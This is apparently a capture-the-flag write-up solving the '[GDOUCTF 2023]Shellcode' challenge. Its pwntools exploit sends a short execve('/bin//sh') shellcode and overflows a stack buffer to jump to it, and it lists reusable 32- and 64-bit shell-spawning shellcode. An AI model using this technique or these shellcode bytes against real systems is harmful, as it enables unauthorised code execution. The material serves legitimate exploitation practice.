Problem: [GDOUCTF 2023]Shellcode
Approach
- General idea
The shellcode pwntools generates by default is too long for the buffer. Use a short hand-written shellcode, or asm(shellcraft.cat("flag")); the payload only has to stay within 0x25 bytes.
EXP
- Exploit code
from pwn import *
context(log_level='debug', arch='amd64', os='linux')
# http://node4.anna.nssctf.cn:28369/
io = remote('node4.anna.nssctf.cn', 28369)
# io = process('./pwn')
elf = ELF('./pwn')
# global buffer the first read() stores our input in (binary is not PIE, so the address is fixed)
name_addr = 0x6010A0
# 23-byte execve("/bin//sh", 0, 0); 24 bytes on the wire with the newline sendline appends, within the 0x25-byte read
shellcode = b"\x48\x31\xf6\x56\x48\xbf\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x57\x54\x5f\x6a\x3b\x58\x99\x0f\x05"
payload1 = shellcode
delimiter = b"Please."
io.sendlineafter(delimiter, payload1)
# second read overflows a 0xa-byte stack buffer: 0xa bytes up to the saved rbp, 8 bytes of rbp, then the return address
num = 0xa + 0x8
payload2 = b"a" * num + p64(name_addr)
delimiter = b"Let's start!"
io.sendlineafter(delimiter, payload2)
io.interactive()
Summary
- 32-bit short shellcode, 21 bytes (execve("/bin//sh") via int 0x80, eax = 0xb):
\x6a\x0b\x58\x99\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x31\xc9\xcd\x80
- 64-bit short shellcode, 23 bytes (execve("/bin//sh") via syscall, rax = 0x3b):
\x48\x31\xf6\x56\x48\xbf\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x57\x54\x5f\x6a\x3b\x58\x99\x0f\x05
- Hand-written shellcode (assembles to 29 bytes, still under 0x25; the leading xor rax, rax is redundant because push 0x3b / pop rax sets rax anyway):
payload = asm('''
xor rax, rax
push 0x3b
pop rax
mov rdi, 0x68732f2f6e69622f
xor rsi, rsi
xor rdx, rdx
push rsi
push rdi
mov rdi, rsp
syscall
''')
